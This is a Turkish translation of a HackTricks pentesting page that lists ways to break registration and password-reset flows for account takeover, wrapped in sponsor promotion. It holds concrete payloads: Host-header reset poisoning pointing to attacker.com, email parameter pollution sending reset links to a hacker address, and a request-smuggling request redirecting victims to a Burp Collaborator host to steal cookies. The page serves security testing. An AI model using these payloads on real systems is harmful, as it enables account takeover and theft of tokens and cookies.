11 KiB
Kayıt ve Ele Geçirme Güvenlik Açıklıkları
AWS hacklemeyi sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
- Resmi PEASS & HackTricks ürünlerini alın
- [The PEASS Family]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [NFT'lerimiz] (https://opensea.io/collection/the-peass-family) koleksiyonumuz
- 💬 Discord grubuna katılın veya telegram grubuna katılın veya bizi Twitter 🐦 @carlospolopm'i takip edin.
- Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.
WhiteIntel
WhiteIntel, dark web destekli bir arama motorudur ve şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından kompromize edilip edilmediğini kontrol etmek için ücretsiz işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını ücretsiz deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
Kayıt Ele Geçirme
Çift Kayıt
- Var olan bir kullanıcı adı kullanarak oluşturmayı deneyin
- E-postayı değiştirerek kontrol edin:
- büyük harf
- +1@
- e-postada nokta ekleyin
- e-posta adında özel karakterler (%00, %09, %20)
- E-postadan sonra siyah karakterler ekleyin:
test@test.com a - victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Kullanıcı Adı Sıralaması
Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anlamaya çalışın.
Şifre Politikası
Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanıp kullanamayacağınızı kontrol edin).
Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
SQL Enjeksiyonu
Bu sayfayı kontrol edin ve kayıt formlarında SQL Enjeksiyonları aracılığıyla hesap ele geçirmeyi veya bilgi çıkarmayı denemeyi öğrenin.
Oauth Ele Geçirmeleri
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
SAML Güvenlik Açıklıkları
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
E-posta Değiştirme
Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin doğru bir şekilde doğrulandığını veya rastgele e-postalara değiştirilebileceğini kontrol edin.
Daha Fazla Kontrol
- Tek kullanımlık e-postaları kullanıp kullanamayacağınızı kontrol edin
- Uzun şifre (>200) DoS'a neden olur
- Hesap oluşturma üzerindeki hız sınırlarını kontrol edin
- username@burp_collab.net kullanın ve geri çağrıyı analiz edin
Şifre Sıfırlama Ele Geçirmeleri
Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı
- E-posta adresinize şifre sıfırlama isteği gönderin
- Şifre sıfırlama bağlantısına tıklayın
- Şifreyi değiştirmeyin
- Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
- Burp Suite proxy'de isteği onaylayın
- Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.
Şifre Sıfırlama Zehirlenmesi
- Burp Suite'de şifre sıfırlama isteğini onaylayın
- Burp Suite'de aşağıdaki başlıkları ekleyin veya düzenleyin:
Host: attacker.com,X-Forwarded-Host: attacker.com - Değiştirilmiş başlıkla isteği yönlendirin
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com - host başlığına dayalı bir şifre sıfırlama URL'si arayın:
https://attacker.com/reset-password.php?token=TOKEN
E-posta Parametresi Aracılığıyla Şifre Sıfırlama
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
API Parametrelerinde IDOR
- Saldırgan kendi hesabıyla giriş yapmalı ve Şifre Değiştir özelliğine gitmelidir.
- Burp Suite'u başlatın ve isteği Intercept edin.
- İsteği tekrarlayıcı sekmesine gönderin ve parametreleri düzenleyin: Kullanıcı Kimliği/e-posta
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Zayıf Şifre Sıfırlama Jetonu
Şifre sıfırlama jetonu her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.
Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın, bazı durumlarda oluşturma algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.
- Zaman Damgası
- Kullanıcı Kimliği
- Kullanıcının E-postası
- Ad ve Soyad
- Doğum Tarihi
- Kriptografi
- Yalnızca Sayı
- Küçük jeton dizisi (karakterler arasında [A-Z,a-z,0-9])
- Jeton yeniden kullanımı
- Jetonun son kullanma tarihi
Şifre Sıfırlama Jetonunun Sızdırılması
- Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
- Sunucu yanıtını inceleyin ve
resetTokeniçin kontrol edin - Ardından, jetonu aşağıdaki gibi bir URL'de kullanın:
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama
- Kurbanın kullanıcı adıyla aynı olan ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş bir kullanıcı adıyla sistemde kayıt olun, örneğin:
"admin " - Zararlı kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
- E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
- Yeni şifre ile kurban hesabına bağlanın.
Platform CTFd bu saldırıya karşı savunmasızdı.
Bkz: CVE-2020-7245
XSS Aracılığıyla Hesap Ele Geçirme
- Uygulama içinde veya çerezlerin üst alan etki alanına (
*.domain.com) kapsandığı bir alt alan içinde XSS bulun. - Mevcut oturum çerezini sızdırın
- Çerez kullanarak kullanıcı olarak kimlik doğrulayın
HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme
1. Türde HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için smuggler'ı kullanın
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. POST / HTTP/1.1'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:
GET http://something.burpcollaborator.net HTTP/1.1 X: hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır
3. Son istek aşağıdaki gibi olabilir
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hesap Ele Geçirme CSRF Aracılığıyla
- CSRF için bir payload oluşturun, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
- Payload'u gönderin
JWT Aracılığıyla Hesap Ele Geçirme
JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.
- JWT'yi başka bir Kullanıcı Kimliği / E-posta ile düzenleyin
- Zayıf JWT imzasını kontrol edin
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
Referanslar
WhiteIntel
WhiteIntel, karanlık ağ destekli bir arama motorudur ve şirketin veya müşterilerinin hırsız kötü amaçlı yazılımlar tarafından kompromize edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını ücretsiz deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
Sıfırdan Kahraman'a AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert) ile!
HackTricks'i desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Family koleksiyonumuzdaki özel NFT'leri keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da 🐦 @carlospolopm'u takip edin.
- Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.